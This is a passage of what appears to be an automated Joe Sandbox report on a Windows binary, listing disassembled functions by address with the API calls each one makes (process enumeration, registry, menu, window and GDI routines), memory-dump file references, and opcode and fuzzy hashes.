                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          • API String ID: 3253778849-0
                          • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction ID: 6ea2ce18995637ab0a8fa219ceb8aee217e8c2c40de726cd0e40a3062ab51239
                          • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction Fuzzy Hash: EE61AA3051025AABDB01EF60CC82EFE7BE9AF04304F4545D9F85A6B2D2EB34AE05DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B61AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00B61B09
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00B61B17
                          • __wsplitpath.LIBCMT ref: 00B61B45
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscat.LIBCMT ref: 00B61B5A
                          • Process32NextW.KERNEL32(00000000,?), ref: 00B61BD0
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B61BE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 1380811348-0
                          • Opcode ID: b5bca3e55bcf5fcf403e2f0580c6ecafd65209446fd3182f6747d6ef16a66ea2
                          • Instruction ID: f168a9d52238eabc1a05a1fe7e51c5f674870f9111507a4ceadcf7221d003ed2
                          • Opcode Fuzzy Hash: b5bca3e55bcf5fcf403e2f0580c6ecafd65209446fd3182f6747d6ef16a66ea2
                          • Instruction Fuzzy Hash: 5C5180715043009FD720EF24D885EABBBE8EF88754F04495EF586D7291EB70EA44CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          • API String ID: 2037614760-0
                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction ID: ba27fd5459b5d7c7d00394c41ba10cde80d3f6f62c79d79b1fc62db2b4179647
                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction Fuzzy Hash: 4151E431A04225AACB11AF98D4819FEB7F1EF14710FA088DAF581AB291DB745FD2D7D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B62EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62FA0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B62FE0
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B63003
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B6302C
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6306F
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B6307C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          • API String ID: 4046560759-0
                          • Opcode ID: 8bd2dc6a9c4041774b1ce0e6d6a168044c0988c2394db2e49e8b0a2fcb1f73d2
                          • Instruction ID: a1aa76eb0fec68a7a774d67aa1d3cdef6c27aeb40f66f7499b99ac58a8e39c30
                          • Opcode Fuzzy Hash: 8bd2dc6a9c4041774b1ce0e6d6a168044c0988c2394db2e49e8b0a2fcb1f73d2
                          • Instruction Fuzzy Hash: 00515631208200AFD715EF64C891E6BBBF9FF88704F04499EF585872A1DB75EA09CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B42ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B42AF6
                          • VariantClear.OLEAUT32(00000013), ref: 00B42B68
                          • VariantClear.OLEAUT32(00000000), ref: 00B42BC3
                          • _memmove.LIBCMT ref: 00B42BED
                          • VariantClear.OLEAUT32(?), ref: 00B42C3A
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B42C68
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          • API String ID: 1101466143-0
                          • Opcode ID: bb744df11879cb9b169d90601e38883dbb02817bc9f6d5019438f1d56b98b359
                          • Instruction ID: 96f7a91ba31be9d41e338d554ae3537cb80e208d1d3ee6240a837a175c8df9cd
                          • Opcode Fuzzy Hash: bb744df11879cb9b169d90601e38883dbb02817bc9f6d5019438f1d56b98b359
                          • Instruction Fuzzy Hash: 1E5147B5A00209EFDB14CF58C880AAAB7F8FF4C314B158599F959DB351E730EA51DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B682DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00B6833D
                          • GetMenuItemCount.USER32(00000000), ref: 00B68374
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B6839C
                          • GetMenuItemID.USER32(?,?), ref: 00B6840B
                          • GetSubMenu.USER32(?,?), ref: 00B68419
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B6846A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: c00fd3e1e045d0683a15ae6742139f59d02c68d6ae20280fbb88dfc01b693bbc
                          • Instruction ID: e1c435724ab18bde72383a75cb8dd284c19c9836d57d6f0d77e21c41c74637fd
                          • Opcode Fuzzy Hash: c00fd3e1e045d0683a15ae6742139f59d02c68d6ae20280fbb88dfc01b693bbc
                          • Instruction Fuzzy Hash: 49519C71A00219EFCB11EFA4C881AAEBBF4EF48710F144599F915BB391DF34AE418B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B454E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B4552E
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B45579
                          • IsMenu.USER32(00000000), ref: 00B45599
                          • CreatePopupMenu.USER32 ref: 00B455CD
                          • GetMenuItemCount.USER32(000000FF), ref: 00B4562B
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B4565C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: 2945675523d7a7f12747ad949eff8b9a5673a8b70504b4ec880744b75046985e
                          • Instruction ID: bc50bae6c0083faec57eee0dedf4fc55da9350d5bbd787170c3e05b801f786fd
                          • Opcode Fuzzy Hash: 2945675523d7a7f12747ad949eff8b9a5673a8b70504b4ec880744b75046985e
                          • Instruction Fuzzy Hash: 3451CF70600E09EFDF30CF68D888BADBBF9EF15318F5041A9E8559B292D7709A44DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B1B1C1
                          • GetWindowRect.USER32(?,?), ref: 00B1B225
                          • ScreenToClient.USER32(?,?), ref: 00B1B242
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B1B253
                          • EndPaint.USER32(?,?), ref: 00B1B29D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          • API String ID: 1827037458-0
                          • Opcode ID: 435956365300bf93fa79b89616da2774a5433be8955eee9d4a8d73aa9de147bc
                          • Instruction ID: 09bf2a8d48a7a775703dc64d0d7bf8e9a017720a6fa45bdb8ce676b975991072
                          • Opcode Fuzzy Hash: 435956365300bf93fa79b89616da2774a5433be8955eee9d4a8d73aa9de147bc
                          • Instruction Fuzzy Hash: 614192711042019FC711DF28DCC4FBA7BE8EF5A320F1406A9F9A5972E2CB319885DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00BC1810,00000000,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E21B
                          • EnableWindow.USER32(?,00000000), ref: 00B6E23F
                          • ShowWindow.USER32(00BC1810,00000000,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E29F
                          • ShowWindow.USER32(?,00000004,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E2B1
                          • EnableWindow.USER32(?,00000001), ref: 00B6E2D5
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B6E2F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 93c5599f6fd89b96bae52a2a10719267ab6a12df8c6660af959eae57e71d6e0b
                          • Instruction ID: 9e94502363773f329d3eb80563b55eb948e573ce8dfed3d46ba1b38bef6fa13e
                          • Opcode Fuzzy Hash: 93c5599f6fd89b96bae52a2a10719267ab6a12df8c6660af959eae57e71d6e0b
                          • Instruction Fuzzy Hash: F5414F39601145EFDB26CF14C4A9B947BE6FB0A314F1841F9EA688F2A2C735E845CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B416F1 Relevance: 9.1, APIs: 6, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B41734
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B4175A
                          • SysAllocString.OLEAUT32(00000000), ref: 00B4175D
                          • SysAllocString.OLEAUT32(?), ref: 00B4177B
                          • SysFreeString.OLEAUT32(?), ref: 00B41784
                          • SysAllocString.OLEAUT32(?), ref: 00B417B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$Free
                          • String ID:
                          • API String ID: 1313759350-0
                          • Opcode ID: c1864980d44f75bbd47083defe1bd376dd753c47867ea63ad0050a4ec0cfa326
                          • Instruction ID: 9123fdaba6c9ee1fcb5fe6a5639f1788ba900ac3cac1601aa9202d5ed752754d
                          • Opcode Fuzzy Hash: c1864980d44f75bbd47083defe1bd376dd753c47867ea63ad0050a4ec0cfa326
                          • Instruction Fuzzy Hash: 9821A775A00219AF9B10AFACCC88CBF73ECEB093747448566F905DB2A1DB70ED819760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B417C8 Relevance: 9.1, APIs: 6, Instructions: 89memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B4180D
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B41833
                          • SysAllocString.OLEAUT32(00000000), ref: 00B41836
                          • SysAllocString.OLEAUT32 ref: 00B41857
                          • SysFreeString.OLEAUT32 ref: 00B41860
                          • SysAllocString.OLEAUT32(?), ref: 00B41888
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$Free
                          • String ID:
                          • API String ID: 1313759350-0
                          • Opcode ID: bcc5d7ca34cc3867894a229c6d32b7c7c0d7a481de2f5530ffa4dece45026198
                          • Instruction ID: b44320b9b15da59b86bc11e3bdd76c8af96b3fc95e87c33f963838a1237518f4
                          • Opcode Fuzzy Hash: bcc5d7ca34cc3867894a229c6d32b7c7c0d7a481de2f5530ffa4dece45026198
                          • Instruction Fuzzy Hash: 0A21A475A00204AF9B00AFACCC88CBA77ECEF093607448566F904DB2A0DA70ED81D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B51BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • _wcstok.LIBCMT ref: 00B51D6E
                          • _wcscpy.LIBCMT ref: 00B51DFD
                          • _memset.LIBCMT ref: 00B51E30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: 46c2e801f143ba83b0cfe070d61bf8d6f60a9974021e8fe9c3e39722b08c75bf
                          • Instruction ID: a26f4002d235693e5f504f56a90f24d4c7633e087840799fcdab296c289d8684
                          • Opcode Fuzzy Hash: 46c2e801f143ba83b0cfe070d61bf8d6f60a9974021e8fe9c3e39722b08c75bf
                          • Instruction Fuzzy Hash: A8C15E715083409FC724EF28C891B5ABBE4EF85310F0449EDF89A972A2DB70ED45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                            • Part of subcall function 00B1B58B: BeginPath.GDI32(?), ref: 00B1B611
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B6E9F2
                          • LineTo.GDI32(00000000,00000003,?), ref: 00B6EA06
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6EA14
                          • LineTo.GDI32(00000000,00000000,?), ref: 00B6EA24
                          • EndPath.GDI32(00000000), ref: 00B6EA34
                          • StrokePath.GDI32(00000000), ref: 00B6EA44
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 2f52a912588c838df3f6ba2f60fb1bc838ec23fe4c8f1810161519942b61a15b
                          • Instruction ID: 77fdb34522ea2882616739a02e611970e138650d8d787fbaa87fc3718fab7853
                          • Opcode Fuzzy Hash: 2f52a912588c838df3f6ba2f60fb1bc838ec23fe4c8f1810161519942b61a15b
                          • Instruction Fuzzy Hash: E6110976000149BFDF029F94DC88EAA7FADEB08350F048062FA599A1B1DB719D55DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00B3EFB6
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B3EFC7
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B3EFCE
                          • ReleaseDC.USER32(00000000,00000000), ref: 00B3EFD6
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B3EFED
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00B3EFFF
                            • Part of subcall function 00B3A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B3A79D,00000000,00000000,?,00B3AB73), ref: 00B3B2CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          • Opcode ID: 8e28487eddcf73962e1cbb6c85bb9a1898bb1cee5b5b01bb59448f209d42c7c7
                          • Instruction ID: 94b8e8ff20579d72686e2fa9ed03e36992b7ea58b9be8fb7e887edc9dd6c7157
